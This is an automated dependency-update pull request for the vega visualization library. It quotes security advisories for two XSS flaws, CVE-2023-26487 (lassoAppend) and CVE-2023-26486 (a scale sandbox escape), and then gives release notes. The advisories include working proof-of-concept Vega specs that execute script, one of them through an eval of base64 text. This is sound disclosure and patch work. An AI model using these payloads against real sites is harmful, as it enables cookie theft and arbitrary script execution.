fix(dependencies): update dependency vega to v5.23.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vega	5.22.0 -> 5.23.0

GitHub Vulnerability Alerts

CVE-2023-26487

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceed minDist or its the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#​006BB4' : '#​939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

CVE-2023-26486

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA

---

Release Notes

vega/vega (vega)

v5.23.0

Compare Source

Changes from v5.22.1:

This version contains dependency updates, bug fixes, and security patches, plus a few extra utilities to aid Vega-Lite.

monorepo

• Update dependencies, including D3 packages.
• Update rollup config to use .mjs extensions.

vega-canvas

• Update rollup config.

vega-crossfilter

• Update rollup config.

vega-dataflow

• Update rollup config.

vega-encode

• Update rollup config.

vega-event-selector

• Update rollup config.

vega-expression

• Update rollup config.

vega-force

• Update rollup config.

vega-format

• Update rollup config.

vega-functions

• Fix lassoAppend expression function XSS. (Thanks @​arvind!)
• Fix scale expression function XSS (Thanks @​ajxchapman and @​hydrosquall!)
• Update rollup config.

vega-geo

• Update rollup config.

vega-hierarchy

• Update rollup config.

vega-interpreter

• Update rollup config.

vega-label

• Prevent evaluation of unsafe methods, #​3570 (Thanks @​AMoo-Miki!)
• Update rollup config.

vega-loader

• Update rollup config.

vega-parser

• Add view style for Vega-Lite, #​3480 (Thanks @​arvind!)
• Update rollup config.

vega-projection

• Register projections as recognized Vega scales.
• Update rollup config.

vega-projection-extended

• Update rollup config.

vega-regression

• Update rollup config.

vega-runtime

• Update rollup config.

vega-scale

• Add registerScale() and isRegisteredScale() methods. (Thanks @​hydrosquall!)
• Register scales as recognized Vega scales.
• Update rollup config.

vega-scenegraph

• Update test cases to match dependency updates.
• Update rollup config.

vega-schema

• Make __count__ private from schema, #​3659 (Thanks @​lsh!)
• Update rollup config.

vega-selections

• Update rollup config.

vega-statistics

• Update rollup config.

vega-time

• Update rollup config.

vega-transforms

• Update rollup config.

vega-typings

• Make __count__ private from schema, #​3659 (Thanks @​lsh!)
• Update scenegraph item typings (Thanks @​jonathanzong!)
• Update rollup config.

vega-util

• Update typescript config.
• Update rollup config.

vega-view

• Wrap querySelectorAll in Array.from, #​3639 (Thanks @​ravron!)
• Update rollup config.

vega-view-transforms

• Update rollup config.
• Fix autosize="fit-x/y" when legend is larger than plot, #​3474 (Thanks @​stas-sl!)

vega-voronoi

• Update rollup config.

vega-wordcloud

• Update rollup config.

vega-cli

• Update rimraf version, adjust code in response.
• Update rollup config.

vega

• Update test scenes to match dependency updates.
• Update rollup config.

v5.22.1

Compare Source

Changes from v5.22.0:

monorepo

• Update dependencies.

vega-scenegraph

• Fix SVG path parser null check. (#​3451).

---

Configuration

📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.